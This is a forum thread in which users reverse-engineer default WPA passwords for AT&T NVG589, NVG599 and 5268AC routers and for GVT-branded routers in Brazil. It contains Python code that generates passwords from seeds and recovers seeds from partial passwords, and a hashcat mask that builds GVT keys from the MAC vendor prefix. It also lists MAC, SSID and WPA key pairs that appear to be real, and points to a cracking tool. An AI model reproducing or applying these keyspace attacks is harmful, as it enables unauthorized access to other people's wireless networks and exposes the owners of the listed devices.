Keyspace List for WPA on Default Routers
#81
(08-15-2017, 02:26 AM)mrfancypants Wrote: I am not sure I even understand your difficulty.

Let's take NVG589 specifically. We have an algorithm that takes in a 64-bit integer 'x' and spits out a 12-letter password:

 for n in range(0,6):
  pw=pw_charset[x%37] + pw
  x/=37
  pw=chr(50+(x%8)) + pw
  x/=37

For whatever reason, AT&T people don't just pull an 'x' out of a RNG or something, instead they pull a 31-bit int and multiply it by a magic number that is approximately 465661287.5245797. (Or possibly do some slightly longer sequence of multiplications and additions which amounts to the same thing, because simply multiplying by that number does not always yield the exact result. But ignore that for now.)

Now, where did they get 465661287.5245797? Beats me. All I know is: (1) if they are starting with a 31-bit number, they had to multiply by _something_ (to span the whole range of passwords), since feeding a 31-bit value direct into code above would always result in passwords that start with 2a2a2a..; (2) that exact value reproduces many of the passwords I see in the wild and that can't be a coincidence. (To calculate it, I basically had the computer run through all possible values until it found one that gave lots of hits.)

for NVG599, they tweak the number->password conversion algorithm and replace the 465... value with 2^32+2. Again why 2^32+2? Not a clue.

Any guesses as to the float number that the 5268AC might be using?

Or is the 5268AC using a variation of the 599 scheme?

I haven't looked at this in at least a couple weeks, but I got as far as modifying some of the python for the 599 and experimenting with different values for where the pwgen function starts (normally at 2^32+2).

Something like this.  I am incrementing "m" in this example.  The first 6 digits were input from an Ebay listing for testing.

Code:
pw_charset='abcdefghijkmnpqrstuvwxyz23456789#%+=?'

for m in range (0, 2147483648):
 def pwgen(x):
         x*=2**32+(m)
         x=int(float(x))
         pw=''
         for n in range(0,12):
                 rem=x%37
                 pw=pw_charset[rem]+pw
                 x/=37
         return pw

 def pw_to_candidate_ints(x):
     val=0
     l=len(x)
     for n in range(0,l):
           val+=pw_charset.find(x[n])*(37**(11-n))
     cands=range(val/0x100000002, (val+37**(12-l))/0x100000002+1)
     val+=37**12
     cands+=range(val/0x100000002, (val+37**(12-l))/0x100000002+1)
     return [y for y in cands if pwgen(y)[:l]==x]

 candidates=pw_to_candidate_ints('9d4c8c')
 for x in candidates:
     print m, pwgen(x)

I was aiming to get it to produce output valid for 5268AC devices.  It was worth a shot, but didn't work.

I am going to have to go back in this thread and see if there was python for the 589 that can be tested.  Perhaps all that is needed for the 5268AC is a different "magic number", a correct floating point value that produces the correct result.

Has anyone had time to experiment?
Reply
#82
Here in Brazil we have an ISP called GVT.
The default password is the Serial Number of the wireless router.
Here is an example:

D-Link
SSID: GVT-8A8A
PASS: N1B9027544
SERIAL: PJ2N1B9027544
MAC: 84:C9:B2:EB:8A:8A

Just count 10 chars from right to left, and that is the WPA/WPA2 Key.
My question is: there is a way to calculate the Serial Number?
D-link was used in this example, but, it can be Arcadyan, Sagemcom, etc. It always will be the Serial Number.
Using wireshark, the serial number received isn't the same in the stick on the bottom.
Thank you for your time.
Reply
#83
Hi all.

Thanks to a member of the forum, I have good news about the GVT network.
The task is not completed yet, but, we have a new informations to share.
1) the first 3 chars of the password come from OUI. E.g:
      OUI         Partial Pass    Router Brand
     6c:19:8f    91E             D-Link International
     84:c9:b2   N1B             D-Link International
     ec:22:80   S1E              D-Link International
So, if the router are a D-Link, we can get the 1st, 2nd and 3rd digts from from the OUI.
The last 6 chars are only numbers.
The 4th position can be number or letter.
The mask for hashcat is: <OUI - info>?1?d?d?d?d?d?d -1 ?u?d
The serial should be linked to the MAC, but i really lack the skill to analyze the firmware.
Any help will be more than welcome here.

A few pairs to analyse:
MAC                                     ESSID      WPA/WPA2
ec2280d30193:fc15b4365e87:GVT-0193:S1E9051450
6c198f02b804:40786ac94fe1:GVT-B805:91E5007819
6815905da437:a89fba14ad7c:GVT-A436:5067014811
c4a81d7f4054:c06599c2d762:GVT-4056:91DC064046
6c198f027914:7ce9d3d7b853:GVT-7917:91E4019783
6c198f023368:d022bed72ab1:GVT-336B:91E4008101
84c9b2eb327d:5c0a5b1f7cd9:GVT-327C:N1B9006527
84c9b2ebbbff:cc52af6190a4:GVT-BBFE:N1B9033142
ec228045ef13:e006e6d03827:GVT-EF13:S1E8013780

Thank you all!

Edit: link to download a firmware
http://ryan.com.br/wp/download/Firmware/...com.br.zip

(08-25-2017, 11:40 PM)zarabatana Wrote: Here in Brazil we have an ISP called GVT.
The default password is the Serial Number of the wireless router.
Here is an example:

D-Link
SSID: GVT-8A8A
PASS: N1B9027544
SERIAL: PJ2N1B9027544
MAC: 84:C9:B2:EB:8A:8A

Just count 10 chars from right to left, and that is the WPA/WPA2 Key.
My question is: there is a way to calculate the Serial Number?
D-link was used in this example, but, it can be Arcadyan, Sagemcom, etc. It always will be the Serial Number.
Using wireshark, the serial number received isn't the same in the stick on the bottom.
Thank you for your time.
Reply
#84
Hi Zarabatana,

thank you for the information.

Could you explain how did you get "91E" from "6c:19:8f"?

Thanks.

(09-07-2017, 08:36 PM)zarabatana Wrote: Hi all.

Thanks to a member of the forum, I have good news about the GVT network.
The task is not completed yet, but, we have a new informations to share.
1) the first 3 chars of the password come from OUI. E.g:
      OUI         Partial Pass    Router Brand
     6c:19:8f    91E             D-Link International
     84:c9:b2   N1B             D-Link International
     ec:22:80   S1E              D-Link International
So, if the router are a D-Link, we can get the 1st, 2nd and 3rd digts from from the OUI.
The last 6 chars are only numbers.
The 4th position can be number or letter.
The mask for hashcat is: <OUI - info>?1?d?d?d?d?d?d -1 ?u?d
The serial should be linked to the MAC, but i really lack the skill to analyze the firmware.
Any help will be more than welcome here.

A few pairs to analyse:
MAC                                     ESSID      WPA/WPA2
ec2280d30193:fc15b4365e87:GVT-0193:S1E9051450
6c198f02b804:40786ac94fe1:GVT-B805:91E5007819
6815905da437:a89fba14ad7c:GVT-A436:5067014811
c4a81d7f4054:c06599c2d762:GVT-4056:91DC064046
6c198f027914:7ce9d3d7b853:GVT-7917:91E4019783
6c198f023368:d022bed72ab1:GVT-336B:91E4008101
84c9b2eb327d:5c0a5b1f7cd9:GVT-327C:N1B9006527
84c9b2ebbbff:cc52af6190a4:GVT-BBFE:N1B9033142
ec228045ef13:e006e6d03827:GVT-EF13:S1E8013780

Thank you all!

Edit: link to download a firmware
http://ryan.com.br/wp/download/Firmware/...com.br.zip

(08-25-2017, 11:40 PM)zarabatana Wrote: Here in Brazil we have an ISP called GVT.
The default password is the Serial Number of the wireless router.
Here is an example:

D-Link
SSID: GVT-8A8A
PASS: N1B9027544
SERIAL: PJ2N1B9027544
MAC: 84:C9:B2:EB:8A:8A

Just count 10 chars from right to left, and that is the WPA/WPA2 Key.
My question is: there is a way to calculate the Serial Number?
D-link was used in this example, but, it can be Arcadyan, Sagemcom, etc. It always will be the Serial Number.
Using wireshark, the serial number received isn't the same in the stick on the bottom.
Thank you for your time.
Reply
#85
Hi robertoakira1.

It is fixed.
Analyzing a few default pair of BSSID:KEY, you can see this relation. E.g:
BSSID                                 KEY
6c198f02b804:91E5007819
6c198f027914:91E4019783
6c198f023368:91E4008101

As you can see, every time the OUI is 6c198f the KEY start with 91E
That is valid for GVT ISP (Brazil).
If I can help with something more, just ask.

(09-09-2017, 04:06 AM)robertoakira1 Wrote: Hi Zarabatana,

thank you for the information.

Could you explain how did you get "91E" from "6c:19:8f"?

Thanks.

(09-07-2017, 08:36 PM)zarabatana Wrote: Hi all.

Thanks to a member of the forum, I have good news about the GVT network.
The task is not completed yet, but, we have a new informations to share.
1) the first 3 chars of the password come from OUI. E.g:
      OUI         Partial Pass    Router Brand
     6c:19:8f    91E             D-Link International
     84:c9:b2   N1B             D-Link International
     ec:22:80   S1E              D-Link International
So, if the router are a D-Link, we can get the 1st, 2nd and 3rd digts from from the OUI.
The last 6 chars are only numbers.
The 4th position can be number or letter.
The mask for hashcat is: <OUI - info>?1?d?d?d?d?d?d -1 ?u?d
The serial should be linked to the MAC, but i really lack the skill to analyze the firmware.
Any help will be more than welcome here.

A few pairs to analyse:
MAC                                     ESSID      WPA/WPA2
ec2280d30193:fc15b4365e87:GVT-0193:S1E9051450
6c198f02b804:40786ac94fe1:GVT-B805:91E5007819
6815905da437:a89fba14ad7c:GVT-A436:5067014811
c4a81d7f4054:c06599c2d762:GVT-4056:91DC064046
6c198f027914:7ce9d3d7b853:GVT-7917:91E4019783
6c198f023368:d022bed72ab1:GVT-336B:91E4008101
84c9b2eb327d:5c0a5b1f7cd9:GVT-327C:N1B9006527
84c9b2ebbbff:cc52af6190a4:GVT-BBFE:N1B9033142
ec228045ef13:e006e6d03827:GVT-EF13:S1E8013780

Thank you all!

Edit: link to download a firmware
http://ryan.com.br/wp/download/Firmware/...com.br.zip

(08-25-2017, 11:40 PM)zarabatana Wrote: Here in Brazil we have an ISP called GVT.
The default password is the Serial Number of the wireless router.
Here is an example:

D-Link
SSID: GVT-8A8A
PASS: N1B9027544
SERIAL: PJ2N1B9027544
MAC: 84:C9:B2:EB:8A:8A

Just count 10 chars from right to left, and that is the WPA/WPA2 Key.
My question is: there is a way to calculate the Serial Number?
D-link was used in this example, but, it can be Arcadyan, Sagemcom, etc. It always will be the Serial Number.
Using wireshark, the serial number received isn't the same in the stick on the bottom.
Thank you for your time.
Reply
#86
Finally fixed my NVG599 code, took me a while to figure out what I did wrong... my output was 2a2a2a.... and I realized that I hadn't done the exponentiation correctly. Feel free to laugh and drop some nasty comments: https://github.com/soxrok2212/PSKracker/...fbe082c54b
Reply
#87
For what it's worth, I wrote some code (currently as a separate piece of PSKracker) to calculate the seed given the password as an input parameter. Currently only for NVG589 models but I'll work on the rest. Can use this for eBay sticker searches so we can hopefully find where the seeds come from. Usage is:
Code:
./pskracker -f <psk_here>

Will return the seed in decimal if found.

https://github.com/soxrok2212/PSKracker/tree/seed
Reply
#88
(11-09-2017, 10:39 PM)fart-box Wrote:
(11-04-2017, 03:03 AM)soxrok2212 Wrote: For what it's worth, I wrote some code...

So if anyone has any actual 5268AC passwords they could post on this thread, it would sure help. 

Do you think searching eBay for 5268AC labels is a good strategy?

Also, what do you mean by 'Passwords as close to one another as possible?' Just trying to understand what that means, precisely.

TIA,
-Cal
Reply
#89
Hi fart-box... I laugh at that every time,

I guess what I am search for in recovering the seeds is some kind of link to another piece of information, i.e. MAC address, serial number, SSID, something.

I know there must be something. The seed HAS to be from somewhere. I doubt they made a generator that's easy enough to run through all possibilities in an hour with average hardware yet made the seed completely random.

So if you take the code for seed recovery and input known passwords then make a list of MAC addresses, serial numbers, SSIDs, seeds and whatever else, I'm sure we will find the pattern.
Reply
#90
Do you have list of default SSIDs for those routers? Or those are just ATT*?
Reply